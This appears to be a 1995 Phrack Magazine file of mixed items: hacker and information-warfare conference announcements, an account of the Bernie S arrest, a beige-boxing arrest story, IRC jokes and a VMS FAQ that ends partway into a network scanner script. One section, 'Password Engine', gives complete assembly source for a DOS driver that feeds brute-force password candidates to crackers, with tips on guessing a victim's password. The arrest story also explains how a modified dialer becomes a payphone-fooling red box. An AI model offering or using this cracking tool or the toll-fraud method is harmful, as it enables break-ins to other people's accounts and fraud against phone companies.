==Phrack Magazine== Volume Six, Issue Forty-Seven, File 3 of 22 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART I ------------------------------------------------------------------------------ -----BEGIN PGP SIGNED MESSAGE----- Phrack Magazine and Computer Security Technologies proudly present: The 1995 Summer Security Conference SSSS U U M M M M EEEEE RRRR CCCC OOOO N N S U U MM MM MM MM E R R C O O NN N SSS U U M M M M M M M M EEE RRRR C O O N N N S U U M M M M M M E R R C O O N NN SSSS UUUU M M M M EEEEE R R CCCC OOOO N N "SUMMERCON" June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia This is the official announcement and open invitation to the 1995 incarnation of Summercon. In the past, Summercon was an invite-only hacker gathering held annually in St. Louis, Missouri. Starting with this incarnation, Summercon is open to any and all interested parties: Hackers, Phreaks, Pirates, Virus Writers, System Administrators, Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers, Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers, Programmers, Conspiracy Nuts, Musicians and Nudists. LOCATION: The Clarion Hotel is located in downtown Atlanta, 9 miles from Hartsfield International Airport and just a few blocks from the Peachtree Center MARTA Station. Considering the exorbitant expenses involved with attending other conferences of this type, Rooms at Summercon are reduced to $65 per night for Single or Double Occupancy The Clarion Hotel Downtown, Courtland at 70 Houston St., NE, Atlanta, GA 30303 (404) 659-2660 or (800) 241-3828 (404) 524-5390 (fax) No one likes to pay a hundred dollars a night. We don't expect you to have to. Spend your money on room service, drinks in the hotel bar, or on k-rad hacker t-shirts. Remember: Mention that you are attending Summercon in order to receive the discount. DIRECTIONS 75/85 Southbound - Exit 97 (Courtland). Go 3 blocks south on Courtland then turn left on Houston (John Wesley Dobbs Ave.) 20 East - Exit 75/85 North at International. Turn Left on Courtland at Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.) 20 West - Exit 75/85 North at International. One block to Courtland and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.) Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's International Airport will drop you off at many hotels in the downtown area, including the Clarion. The shuttle should be no more than 12 dollars. Fares may be paid at the Airport Shuttle in the Ground Transportation area of the Airport Terminal. MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a convenient and inexpensive way to negotiate most of the Atlanta area. Take the MARTA train from the Airport to the Peach Tree Center Station. Walk three blocks down Houston to the intersection of Houston and Courtland. The MARTA fare will be roughly 2 dollars. Taxis - The average cab fare from Atlanta's Airport to the downtown area is roughly 30 dollars. CONFERENCE INFO It has always been our contention that cons are for socializing. "Seekret Hacker InPh0" is never really discussed except in private circles, so the only way anyone is going to get any is to meet new people and take the initiative to start interesting conversations. Because of this, the formal speaking portion of Summercon will be held on one day, not two or three, leaving plenty of time for people to explore the city, compare hacking techniques, or go trashing and clubbing with their heretofore unseen online companions. The "Conference" will be held on June 3rd from roughly 11:00 am until 6:00 pm with a 1 hour lunch break from 1:00 to 2:00. NO VIDEO TAPING WILL BE ALLOWED IN THE CONFERENCE ROOM. Audio Taping and still photography will be permitted. CURRENT LIST OF SPEAKERS: Robert Steele - Ex-Intelligence Agent, Founder and CEO of Open Source Solutions (a private sector intelligence firm) Topic: Hackers from the Intelligence Perspective Winn Schwartau - Author of "Information Warfare" and "Terminal Compromise", Publisher of Security Insider Report, and noted security expert Topic: Electromagnetic Weaponry Bob Stratton - Information Security Expert from one of America's largest Internet service providers Topic: The Future of TCP/IP Security Eric Hughes - Cryptography Expert and founding member of the "Cypherpunks" Topic: Cryptography, Banking, and Commerce Annaliza Savage - London-based Director/Producer Topic: Discussion of her documentary "Unauthorized Access" (Followed by a public screening of the film) Chris Goggans - Editor of Phrack Magazine and Summercon M.C. Topic: introductions, incidentals and a topic which is sure to culminate in an international incident. (Other Speakers May Be Added - Interested parties may contact scon@fc.net) COSTS Since other cons of this type have been charging from 25 to 40 dollars entry fees, we are only charging 10 dollars. Yes, that's correct, TEN (10) dollars in US currency. Money is far too scarce among the hacker community to fleece everyone for money they will probably need to eat with or pay for their hotel rooms. WHAT TO DO IN ATLANTA: To attempt to make everyone's stay in Atlanta more exciting, we are contacting local establishments to arrange for special discounts and/or price reductions for Summercon attendees. Information will be handed out regarding these arrangements at the conference. Atlanta is a happening town. Touristy Stuff Party Time The World of Coca-Cola Buckhead Underground Atlanta The Gold Club Georgia Dome (Baseball?) (Countless Other Clubs and Bars) Six Flags CONTACTING SUMMERCON SPONSORS You can contact the Summercon sponsors by several means: E-mail: scon@fc.net WWW: http://www.fc.net/scon.html Snail Mail: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 If deemed severely urgent, you can PGP your email with the following PGP key: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR tBRwaHJhY2tAd2VsbC5zZi5jYS51cw== =evjv - -----END PGP PUBLIC KEY BLOCK----- See you in Atlanta! -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBL4mMEaR4oxgb1CldAQE5dQP+ItUraBw4D/3p6UxjY/V8CO807qXXH6U4 46ITHnRJXWfEDRAp1jwl+lyavoo+d5AJPSVeeFt10yzVDEOb258oEZkIkciBnr7q mUu563/Qq67gBsOWYP7sLdu3KEgedcggkzxtUzPxoVRVZYkHWKKjkG1t7LiT3gQ5 uRix2FrftCY= =m/Yt -----END PGP SIGNATURE----- ------------------------------------------------------------------------------ UNAUTHORIZED ACCESS "Unauthorized Access [is] a documentary that tells the story of the computer underground from our side, it captures the hacker world from Hamburg to Los Angeles and virtually everywhere in between." 2600 The Hacker Quarterly Computers are becoming an integral part of our everyday existence. They are used to store and send a multitude of information, from credit reports and bank withdrawals, to personal letters and highly sensitive military documents. So how secure are our computer systems? The computer hacker is an expert at infiltrating secured systems, such as those at AT&T, TRW, NASA or the DMV. Most computer systems that have a telephone connection have been under siege at one time or another, many without their owner's knowledge. The really good hackers can reroute the telephone systems, obtain highly sensitive corporate and government documents, download individual's credit reports, make free phone calls globally, read private electronic mail and corporate bulletins and get away without ever leaving a trace. So who are these hackers? Just exactly WHAT do they do and WHY do they do it? Are they really a threat? What do they DO with the information that they obtain? What are the consequences of their actions? Are hackers simply playing an intellectual game of chess or are hackers using technology to fight back and take control of a bureaucratic system that has previously appeared indestructible? Unauthorized Access is a documentary that demistifies the hype and propaganda surrounding the computer hacker. Shot in 15 cities and 4 countries, the film hopes to expose the truths of this subculture focusing on the hackers themselves. Unauthorized Access is a view from inside the global underground. For a PAL (European) copy send a cheque/postal order for 15 British Pounds or $25 for NTSC (American) standard to: Savage Productions Suite One 281 City Road London EC1V 1LA ------------------------------------------------------------------------------ ACCESS ALL AREAS Hacking Conference 1st - 2nd July, 1995 (Saturday & Sunday) King's College, London, UK -------------------------------WHAT-IT-IS--------------------------------- The first UK hacking conference, Access All Areas, is to be run in London later this year. It is aimed at hackers, phone phreaks, computer security professionals, cyberpunks, law enforcement officials, net surfers, programmers, and the computer underground. It will be a chance for all sides of the computer world to get together, discuss major issues, learn new tricks, educate others and meet "The Enemy". -------------------------------WHERE-IT-IS-------------------------------- Access All Areas is to be held during the first weekend of July, 1995 at King's College, London. King's College is located in central London on The Strand and is one of the premier universities in England. -----------------------------WHAT-WILL-HAPPEN----------------------------- There will be a large lecture theatre that will be used for talks by computer security professionals, legal experts and hackers alike. The topics under discussion will include hacking, phreaking, big brother and the secret services, biometrics, cellular telephones, pagers, magstrips, smart card technology, social engineering, Unix security risks, viruses, legal aspects and much, much more. Technical workshops will be running throughout the conference on several topics listed above. A video room, equipped with multiple large screen televisions, will be showing various films, documentaries and other hacker related footage. The conference facilities will also include a 10Mbps Internet link connected to a local area network with various computers hanging off of it and with extra ports to connect your laptop to. ------------------------------REGISTRATION-------------------------------- Registration will take place on the morning of Saturday 1st July from 9:00am until 12:00 noon, when the conference will commence. Lectures and workshops will run until late Saturday night and will continue on Sunday 2nd July from 9:00am until 6:00pm. ----------------------------------COST------------------------------------ The price of admission will be 25.00 British pounds (approximately US $40.00) at the door and will include a door pass and conference programme. -----------------------------ACCOMMODATION-------------------------------- Accommodation in university halls of residence is being offered for the duration of the conference. All prices quoted are per person, per night and include full English breakfast. (In British pounds) SINGLE TWIN WELLINGTON HALL 22.00 16.75 Special prices for British and Overseas university students, holding current student identification, are also available - please call King's Campus Vacation Bureau for details. All bookings must be made directly with the university. They accept payment by cash, cheque and credit card. To making a booking call the following numbers... KING'S CAMPUS VACATION BUREAU Telephone : +44 (0)171 351 6011 Fax : +44 (0)171 352 7376 ----------------------------MORE-INFORMATION------------------------------ If you would like more information about Access All Areas, including pre-registration details then please contact one of the following... Telephone : +44 (0)973 500202 Fax : +44 (0)181 224 0547 Email : info@phate.demon.co.uk ------------------------------------------------------------------------------ D I S T R I B U T E W I D E L Y *****FIRST CALL FOR PAPERS***** InfoWarCon '95 A 2 Day International Symposium on Information Warfare September 7-8, 1995 Stouffer Concourse Hotel Arlington, VA Presented by: National Computer Security Association Winn Schwartau and Interpact, Inc. Robert Steele and OSS, Inc. CONFERENCE OVERVIEW: The Information Warfare Conference (InfoWarCon) is our third international conference dedicated to the exchange of ideas, policies, tactics, weapons, methodologies and defensive posture of Information Warfare on a local, national, and global basis. InfoWarCon will bring together international experts from a broad range of disciplines to discuss and integrate concepts in this rapidly evolving field. Attendees will intensely interact with the speakers and presenters as well as each other to increase each other's understanding of the interrelatedness of the topics. While there are many interpretations of Information Warfare by different groups, the current working definition we employ is: Information Warfare is the use of information and informa tion systems as weapons in a conflict where information and information systems are the targets. Information Warfare is broken down into three categories, and InfoWarCon speakers and attendees will interactively examine them all: Class I: Personal Privacy. "In Cyberspace You Are Guilty Until Proven Innocent." The mass psychology of information. Privacy versus stability and law enforcement. Class II: Industrial and Economic Espionage. Domestic and international ramifications and postures in a globally networked, competitive society. Class III: Global Information Warfare. Nation-state versus Nation-state as an alternative to convention warfare, the military perspective and terrorism. THE CONFERENCE The conference is designed to be interactive - with extensive interaction between all participants. The preliminary contents and discussions will focus on: - What is Information Warfare? - What Are the Targets? - Protecting the Global Financial Infrastructure - Military Perspectives on InfoWar - InfoWar Vs. Non-Lethal Warfare - Defending the U.S. Infrastructure - The Intelligence Community and Information - Open Source Intelligence - The Psychology of Information - Privacy Balances - Information As the Competitive Edge - International Cooperation - Denial of Service - Cyber-Terrorism - Offensive Terrorism - Offensive InfoWar Techniques - Defensive InfoWar Postures - Education and Awareness Training - Corporate Policy - Government Policy - Global Policy - Espionage - Export Controls of Information Flow - The Legal Perspective - The New Information Warriors Plenary sessions will accommodate all attendees, while break-out sessions will provide more intimate presentations and interactiv ity on topics of specific interests. SUBMISSIONS: Submission for papers are now be accepted. We are looking for excellent speakers and presenters with new and novel concepts of Information Warfare. You may submit papers on the topics listed above, or on others of interest to you, your company or govern ment. We welcome innovative thought from the private sector, the gov ernment (civilian, military and intelligence) and the interna tional community. Submissions must be received by May 1, 1995, and notification of acceptance will occur by June 1, 1995. Please submit 2-3 page presentation outlines to: winn@infowar.com. All submissions and the contents of InfoWarCon '95 will be in English. If you must submit a hard copy: Fax: 813.393.6361 or snail mail to: Interpact, Inc. 11511 Pine St., Seminole, FL 34642 All submissions and presentation should be unclassified, as they will become Open Source upon submission and/or acceptance. SPONSORS: The Information Warfare Symposium is currently choosing sponsors for various functions. Continental Breakfast, Day 1 and Day 2 Morning Coffee Break, Day 1 and Day 2 Lunch, Day 1 and Day 2 Afternoon Coffee Break, Day 1 and Day 2 Cocktail Party, Day 1 Each Corporate or Organizational sponsor will be included in all promotional materials and Symposium function. For more infor- mation, contact Paul Gates at the NCSA. Voice: 717.258.1816 or email: 747774.1326@Compuserve.com. EXHIBITS: Limited space is available for table-top displays for commercial or governmental products, services, educational or other promo tion. For further information, contact Paul Gates at the National Computer Security Association. 717.258.1816 REGISTRATION: Payment made BEFORE July 1, 1995: ( ) $445.00 NCSA Member/OSS Attendee ( ) $545.00 All others Payment made AFTER July 1, 1995: ( ) $495.00 NCSA Members/OSS Attendees ( ) $595.00 All others ( ) I'M INTERESTED, but would like more information sent to the address above. Please include a free copy of your 32 page "Information Security Resource Catalog". ( ) I'd like to know more about NCSA on-site training, security audits and consulting services. Please have someone give me a call. MAIL OR FAX TO: National Computer Security Association 10 South Courthouse Avenue Carlisle, PA 17013 Phone 717-258-1816 or FAX 717-243-8642 EMAIL: 74774.1326@compuserve.com CompuServe: GO NCSAFORUM Winn Schwartau Interpact, Inc. Information Security & Warfare V:813.393.6600 F:813.393.6361 Email: Winn@Infowar.Com ------------------------------------------------------------------------------ Ed Cummings, also known to many in cyberspace as "Bernie S" was arrested on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale of a device to commit Telecommunications fraud charges. He is being held in Delaware County Prison in lieu of $100,000.00 Bail. His story follows. On the evening of the 13th Bernie S. received a page from his mail drop. Some people he knew from Florida had stopped in at his mail drop thinking it was his address. They were looking to purchase several 6.5 Mhz Crystals. These crystals when used to replace the standard crystal in the RADIO SHACK Hand Telephone dialer, and with some programming, produce tones that trick pay phones into believing they have received coins. These are commonly referred to as "red boxes" and got their name from an actual red box pulled from a pay phone in the late seventies by some curious person. Ed Cummings met these people at a local 7-11 (which 7-11?) where he was to sell the widely used electronic timing crystals for roughly $4 a piece. The purchaser only had two twenty dollar bills and Ed Cummings no change. Ed Cummings went into the 7-11 to get some change to make the transaction. A police officer noticed a van parked in the parking lot of the 7-11 with more several African Americans inside. As Ed was leaving the 7-11 he noticed fifteen police cars pulling into the parking lot of the 7-11. Next thing he knew the police were asking him if they could `rifle` through his car. He said no. Moments later as he was talking to a Detective and noticed another police officer going through his car. He asked the officer to stop. They did not, in all the police confiscated a few hundred 6.5Mhz crystals (which he resells for roughly $4 a piece) and a large box of 100 dialers. The police told him they would get back to him, and he could have his electronics back if the contents of the bag were legal. In the contents of the seized items was one modified dialer, that a customer returned after modification explaining that it did not work, a broken red box. The next day Ed `Bernie S.` Cummings was over at a friend`s house working on their computer when eight to ten plain clothed armed men burst into the house and ordered him and his friends to freeze. They cuffed him and took him to a holding cell (what jail?). There he was left without a blanket or jacket to sleep with in the cold cell. That evening the Secret Service had been called in when someone figured out what the dialers and crystals would do when put together. The United States Secret Service found his home and entered it, while they were questioning him. The next morning at his arraignment he was finally told of the charges he was being held upon. They were Two misdemeanor Charges of manufacture, Distribution and Sale of devices of Telecommunications Fraud. and Two Unlawful use of a computer charges. His bail was automatically set to $100,000.00 because Ed Cummings refused talk with the police without his attorney present. The Secret Service presented to the judge a 9 page inventory of what they had found in his home. On that inventory there 14 computers. 2 printers. more Boxes of bios chips for the systems he worked with. Eprom burners which the Federal Agents had labeled "Cellular telephone chip reprogramming adapters" Eproms are used in everything from Automobile computers to personal computers. They also confiscated his toolbox of screw drivers, wire clippers and other computer oriented tools he used for his consulting job. The Judge dropped the Two unlawful use of a computer charges due to the fact that the evidence was circumstantial and the county had no actual evidence that Ed had ever used the computers in question. As of 3/27/1995 Ed Cummings is still in Delaware County Prison awaiting his trial. His trial has not yet been scheduled and Ed will most likely not raise the One Hundred Thousand Dollars needed to be released on bail. ------------------------------------------------------------------------------ "Don't believe the hype." - Public Enemy, 1988 This file's purpose is to clear up any misconceptions about the recent situation that has come upon the sociopolitical group known as KoV. As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for ANYTHING. We have received several tip-offs from private sources regarding a supposed "FBI investigation" of our group that is purported to be active at this very minute. However, with the exception of a few VERY suspicious incidents and coincidences, there has been NO HARD EVIDENCE thus far about ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for the integrity of our innocence, we must stress that nothing has gone down. Yet. We have very good reason to believe that a few of those among us are about to be charged with various false accusations by a local university. However the current mental state of the person in charge of this charade is also in question. Therefore it would be logical to assume nothing. The conflicting tip-offs, rumors, warnings and threats that we have received make it even more difficult to get a clear picture of exactly what is going on. We have heard so many things from so many different sources, both credible and questionable, that we would be hard-pressed to give an accurate evaluation of the current state of things. What we can say for sure, however, is that KoV officially died on Monday, January 23, 1995, along with its communications network, KoVNet. This promises to be a great loss to the open-minded and sociopolitical community as well as the free-thinkers and activists who supported us so generously. Our reasons for disbanding the group were many, but the foremost was in light of the current situation we are facing. Consider this last obstacle our final, stalwart stand against the evils of AmeriKKKan government and its various greedy, capitalistic agencies. From the moment of KoV's conception, they have publicly sought to destroy us; to silence our questioning of authority, to oppress our free-thinking minds, and to close off our intellectual channels of communication. They have even gone so far as to stalk us in public places. 'Tis a shame indeed. If you have any questions or if you wish to contact us for any reason, you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV". I will try to post further updates of this saga to CiPNet, ThrashNet, QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can. We would appreciate any support that other h/p, art or political groups can lend us. Until then, my friends... -Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV ------------------------------------------------------------------------------ What happens when you are caught beige boxing. by Rush 2 Yeah yeah, I'm the only one. But here is a generally interesting description of everything to getting caught to arraignment. Well about 5 months ago i needed to set up a conference really quick.. it was about 12:00 (never knew there was a 10:00 pm curfew in that area) and went to a 25 pair box at this local strip mall. Well I was out there the box was already open and I was just about to start testing pairs to see which was connected and what wasn't. All of a sudden, i hear this loud screeching sound of a car coming to a skid from doing about 90mph. I turned and saw that typically dirty squad car about to hit me.. you know the car, mud and dust on the tires and body, coffee and smudge marks all over the windshield. i got on my bike and started to run. Now the thing is I COULD have gotten away.. the pathetic excuse for a cop had run not more than 10 yards after me and decided that I was a threat so he pulled his handgun and yelled. I saw this and thought it would be wiser to stop than get shot. Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did not know i was less than a half mile from a police station and they were looking for a prowler in the general area. The police did the normal, called me scum, asked me what i was doing, searched me until they were satisfied... than picked me up and threw me in the car... the funny thing was they didn't see my phone until they threw me into the back seat and the cord fell out.. (they never saw the page of notes and 'naughty' material in my pocket though it was about 4 inches thick and sticking out that a blind man could see it. Well they got me to the station and pried my info out, and called my father... I came up with a good enough story about some made up user who told me to go across the street and plug in.. then I was told I would be dealt with in the next week... I did not receive anything for three and a half months. Once the time came for the arraignment (for a juvenile they called it an intake). I got to go to the police station, sit for about 3 hours (as if i thought they would be on time) until I waited for my probation officer. Finally she got there and we proceeded to talk. She explained all of the charges and my lawyer (interesting guy) laughed, I was being charged with prowling (could be disputed I was on a public sidewalk and there in that strip mall is a 24 hr laundry mat), loitering (again that could be disputed), and attempted theft of services (though I NEVER even plugged in). After this was all said i spent the next hour talking with the lady in private. I immediately found she had an interest in computers and was having a problem with her home pc. So I easily changed the topic to my fascination in computers and solved her problem with her computer, and answered at least 50 questions about them. In the last 10-15 minutes of the conversation all i could get from her were statements about how impressed and how intrigued she was with me. She ended up giving me a look (that was hard to judge but i am staying away from this chick) that was either confusion or attraction, slipped me a card with her home phone number and name and called back in my lawyer and parents. Once they got back in, all that she really said was I was a great boy, that she would like to see me do more with my time besides computers, and that she was taking my sentence of 12 months formal probation with 300 hours of community service to 3 months of informal probation with 30 hours of community service. That and she said bell was asking her what to do and she would tell them that it was a non issue since I did not plug in and even if I had it would not be their concern unless I had plugged in to the telco access part of the network interface. Well I have yet to receive official record of having to perform the community service or the probation but I called my probation officer yesterday and said she wasn't putting the community service into the punishment and it has been an equivalent amount of time to just say that since I haven't gotten in trouble since she will count the probation as already served. Luckily she based all other needs of me on the report from a teacher, and with my luck she picked the one teacher, my computers teacher, that no matter what I did or said would lie and say I didn't. Thanks to erikb for publishing this, and greets to CXrank, paradox, dark phiber, the fat cop (who spilled his coffee and box of donuts coming after me) that made this all possible, and to everyone else. -rush 2 http://www-bprc.mps.ohio-state.edu/cgi-bin/hpp/Rush_2.html Look for My site, unforeseen danger soon to be on a 28.8 slip and by the end of the summer on a 500k slip connect. ------------------------------------------------------------------------------ [Something found on IRC] Danny Partridge Emmanuel Goldstein (AKA Danny Bonaduce: (AKA Eric Corley: a child star from the child-like publisher "The Partridge Family" of 26oo magazine. ---------------------- ------------------ Hosts a boring local Hosts a boring local radio program. radio program. Quasi Celebrity Quasi Celebrity Status among Status among 70's freaks telephone phreaks Periods of Heavy Periods of Heavy Drug Usage Drug Usage Involved in Sex Involved in Sex Scandal with Scandal with another man another man Last name is Friends with Phiber "Bonaduce" Optik whose first handle was "Il Duce" Supplements incoming Supplements incoming by doing desperate by doing desperate local talk shows local talk shows whenever he can. whenever he can. ------------------------------------------------------------------------------ Top 10 #hack fights that would be the coolest to see. (And no, Ophie's not in it twice just because she's a girl...) =========================================================================== 10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling featuring KL & TK. 9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the one after that... or, uh... 8.) C-Curve and Elite Entity, "Who's who?" 7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere." (Or: "I'm totally numb, let me hug you!!!") 6.) Dan Farmer and Pete Shipley: "Whips vs. Chains" 5.) Grayarea vs. Netcom "No, *I* want root..." 4.) WWF Wrestling with Len and |al|. 3.) Ophie vs. Voyager, "Night of the Living Dead." 2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle." and the number one #hack fight is 1.) Ophie vs. all the #hack guys, "10 Bucks on the Girl" ------------------------------------------------------------------------------ P A S S W O R D E N G I N E (for IBM PC's) by Uncle Armpit +++++++++++++++++++++++++++++++++++++++++++++ The device driver code listed below provides a data stream of passwords. The device driver approach was used to speed up the process of cracking passwords on an incremental basis. The usual approach was to generate the passwords to a file, then reading the file, etc..the device driver approach circumvents these file storage problems, and others, such as having enough free disk space and delays from disk i/o. This driver operates completely in memory (approx. 0.5Kb) How practical is this? ---------------------- This program would be very useful if you think you may know what strategy the user/admin uses for picking out their passwords. Without eliciting some sort of a strategy, forget it-- unless your desperate enough!! A "strategy" could consist of any of these possible advantages-- 1) default passwords (ie: SIN, student #, birth date, phone number...) 2) the mutation of a lUSERs' known password from another system 3) viewing the mark typing in most of their password with a couple of unseen characters 4) etc... --------------------------- With the sample device driver provided, passwords starting at 'aaaaaaa' and ending with 'zzzzzzz' will be generated. The length of the password string can be modified by changing the length of the password string itself (that is, the variable "number"). The range of characters in the passwords can also be changed by modifying the following two lines: ;hackdrv.sys ;. ;. ; for ending character-- cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range ...and for starting character cmp byte ptr [number+si],'a' ;starting char. in range ; ;---------------------- for instance, if you wished to generate numbers from "0000000" to "9999999" -change the ending character to: cmp byte ptr [number+si],'9'+1 -starting character to: cmp byte ptr [number+si],'0' and "number" variable from 'aaaaaa' to '0000000' and then recompile.. ----- ..or in the third case, if u had observed a lUSER type in most of their password, you may want to rewrite the code to limit the search. IE: limit the keys to a certain quadrant of the keyboard. Modify the code starting at "reiterate:" and ending at "inc_num endp" for this. ================================================================= /'nuff of this!/ How do I get things working? ----------------------------------------------- Compile the device driver "hackdrv.sys", and the second program, "modpwd.asm". Then specify the device driver inside config.sys (ie: "c:\hackdrv.sys"). The code below was compiled with the a86 compiler, v3.03. Some modifications might be needed to work with other compilers. To use it in prgs like crackerjack, type in the following on the command line: c:\>jack -pwfile: -word:hackpwd ------ If you had stopped a cracker program (eg: crackerjack) and want to pick up from where you left off, run the program "modpwd.com". This program can change HACKDRVs password through- a) a command line argument (ie: "modpwd aabbbbe") b) executing the program with no parameters (this method also displays the current password in memory) Happy Hacking, Uncle Armpit ;-----------------------cut here-------------------------------- ;Program HACKDRV.SYS ; org 0h next_dev dd -1 attribute dw 0c000h ;character device w/ ioctl calls strategy dw dev_strategy interrupt dw dev_int dev_name db 'HACKPWD ' countr dw offset number number db 'aaaaaa',0ah ;<----six characters, lower case numsize equ $-number - 2 afternum: ;working space for device driver rh_ofs dw ? rh_seg dw ? dev_strategy: ;strategy routine mov cs:rh_seg,es mov cs:rh_ofs,bx retf dev_int: ;interrupt routine pushf push ds push es push ax push bx push cx push dx push di push si cld push cs pop ds mov bx,cs:rh_seg mov es,bx mov bx,cs:rh_ofs mov al,es:[bx]+2 rol al,1 mov di,offset cmdtab xor ah,ah add di,ax jmp word ptr[di] cmdtab: ;command table dw init ;0 dw exit3 ;1 dw exit3 ;2 dw ioctl_read ;3 dw do_read ;4 dw exit3 ;5 dw exit3 ;6 dw exit3 ;7 dw exit3 ;8 dw exit3 ;9 dw exit3 ;10 dw exit3 ;11 dw ioctl_write ;12 dw exit3 ;13 dw 5 dup (offset exit3) ioctl_read: push es push bx mov si,es:[bx+10h] mov di,es:[bx+0eh] mov es,si push cs pop ds mov si,offset number xor cx,cx get_char: lodsb stosb inc cl cmp al,0ah jz ioctl_rend jmp get_char ioctl_rend: pop bx pop es mov es:[bx+012h],cx mov cs:countr,offset number jmp exit2 ioctl_write: push es push bx mov si,es:[bx+010h] mov ds,si mov si,es:[bx+0eh] mov cx,numsize+1 ;es:[bx+012h] push cs pop es mov di,offset number repe movsb pop es pop bx mov cs:countr,offset number jmp exit2 do_read: push es push bx push cs pop ds mov si,[countr] inc si ;word ptr [countr] cmp si,offset afternum jnz is_okay mov si,offset number call inc_num is_okay: mov [countr],si mov di,es:[bx]+0eh mov ax,es:[bx]+010h mov cx, es:[bx]+012h jcxz clean_up mov es,ax repe movsb clean_up: pop bx pop es jmp exit2 exit3: mov es:word ptr 3[bx],08103h jmp exit1 exit2: mov es:word ptr 3[bx],0100h exit1: pop si pop di pop dx pop cx pop bx pop ax pop es pop ds popf retf exit: inc_num proc near push si mov si,numsize reiterate: inc byte ptr [number+si] cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range jnz _exit mov byte ptr [number+si],'a' ;starting char. in range dec si cmp si,-1 jnz reiterate mov byte ptr [number],01ah ;send EOF _exit: pop si ret inc_num endp at_eof: ; the non-resident code starts here initial proc near push es push cs pop ds push cs pop es mov si,offset number mov di,offset tmpnum cld _again: lodsb cmp al,0ah jz _nomorechars stosb jmp _again _nomorechars: mov si,offset msgend mov cx,4 repe movsb mov ah,09 ;print welcome message mov dx,offset msg1 int 21h pop es ret initial endp init: call initial mov ax,offset at_eof mov es:[bx]+0eh,ax push cs pop ax mov es:[bx]+010h,ax mov cs:word ptr cmdtab,offset exit3 jmp exit2 msg1 db "Incremental Password Generator (c)1995",0ah,0dh db "Written by Uncle Armpit",0ah,0dh,0ah,0dh db "Starting at word [" tmpnum db 10 dup (?) msgend db "]",0a,0d,'$' ;END hackdrv.sys ;------------------------------cut here---------------------------------- ;PROGRAM modpwd.asm ; org 0100h mov ax,03d02h xor cx,cx mov dx,offset devname int 21h jnc drvr_found mov ah,09 mov dx,offset no_drvr int 21h jmp error_pass drvr_found: mov bx,ax mov ax,04402h mov cx,20 ;read 20 characters mov dx,offset databuffr int 21h mov pass_len,al dec al mov ah,al and al,0fh mov cl,4 shr ah,cl add ax,03030h cmp al,'9' jbe inrange add al,7 inrange: cmp ah,'9' jbe inrange1 add ah,7 inrange1: mov byte ptr [num_chr],ah mov byte ptr [num_chr+1],al cld mov di,offset databuffr-1 xor cx,cx mov cl,pass_len add di,cx mov si,offset pass_end mov cx,stringsz repe movsb ;check for information in command line ;else--> prompt for user input mov al,pass_len or byte ptr [0080h],0 jz req_input mov cl,[0080h] dec cl mov [0081h],cl mov si,0081h mov di,offset newpass mov cx,20 repe movsb jmp vrfy_info req_input: mov ah,09 mov dx,offset cur_pass int 21h mov ah,0a mov dx,offset pass_len int 21h vrfy_info: mov ax,word ptr [pass_len] cmp ah,0 jz error_pass dec al cmp ah,al jnz error_len ;change the current password xor cx,cx mov cl,al mov ah,044h mov al,03 mov dx,offset newpass+1 int 21h jnc success_pass error_len: mov ah,09 mov dx,offset errormsg int 21h error_pass: mov ax,04c01h ;abnormal termination int 21h success_pass: mov ax,04c00h int 21h devhandle dw ? cur_pass db 'Current password is [' databuffr db 20 dup (?) pass_end db '] ;' num_chr db ' ' db ' characters',0ah,0dh,0ah,0dh prompt db 'New word: ','$' stringsz equ $ - pass_end pass_len db 00 newpass db 20 dup (?) errormsg db 'error changing password!',0ah,0dh,'$' no_drvr db 'Error: ' devname db "HACKPWD ",00 db 'device driver not loaded!',0ah,0dh,07,'$' ------------------------------------------------------------------------------ -- Frequently & Rarely asked questions about VMS -- part one by Opticon the Disassembled - UPi [1] " I have a kropotkin.hlp file. What could I possibly do with it ? " $ library /insert /help sys$help:helplib.hlb kropotkin.hlp . . . $ help kropotkin [2] " I have a bakunin.tlb file. What to do with it ? " $ library /extract=(*) bakunin.tlb . . . $ dir [3] " I would like to have a look at prunton.dat. " $ dump [/block=(count:x)] prunton.dat Where "x" is the number of blocks DUMP will display. [4] " How can I use an external editor with mail ? " $ mail :== mail /edit=(send,reply=extract,forward) [5] " How a HELP file is organized ? " $ create example.hlp 1 EXAMPLE THIS IS AN EXAMPLE. 2 MORE_EXAMPLES MORE EXAMPLES. 3 EVEN_MORE_EXAMPLES EVEN MORE EXAMPLES. [6] " How can I have a look at queues ? " $ show queue smtp /all/full or $ show queue /batch/all/full or $ show queue /all/full [7] " My mail is holded, for some reason, in the SMTP queue... " Either $ delete /entry=XXX or $ set entry XXX /release in order to force VMS to release it right away. [8] " How do I have a look at DTE and circuits available. " $ mc ncp show known dte and $ mc ncp show known circuits You may also may find of interest: $ mc ncp show known networks $ mc ncp show known lines $ mc ncp show known destinations [9] " I need a NUA scanner for VMS. " $ OPEN/READ VALUES SCAN.VAL $ READ VALUES PRE $ READ VALUES DTE $ READ 